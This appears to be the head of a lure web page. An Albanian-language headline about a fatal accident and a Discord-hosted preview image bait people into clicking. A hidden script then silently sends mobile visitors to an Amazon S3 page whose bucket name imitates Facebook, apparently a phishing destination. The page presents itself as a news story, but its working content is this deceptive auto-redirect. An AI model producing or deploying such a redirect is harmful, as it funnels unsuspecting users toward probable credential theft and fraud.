<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="219,142,105,vizitat"/>
<meta name="robots" content="index, follow"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Një aksident tragjik ka marrë disa jetë njerëzish mëngjesin e sotëm."/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1220457453838143602/1223600681177579520/GHFDHGFHDFHFG.jpg?ex=661a71ef&is=6607fcef&hm=8b55dc7cf30367543c0fbfb66d13fc0bdd71ec2c8e6355fe3253cdc7c3e72637&=&format=webp"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<script type="text/javascript">
    //<![CDATA[
        var isMobile = /Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
    
        if (isMobile) {
            window.location.href = "https://faceboovbefadz217894.s3.eu-central-1.amazonaws.com/faskimng0012-brau2/mango01.html";
        }
    //]]>
    </script>
    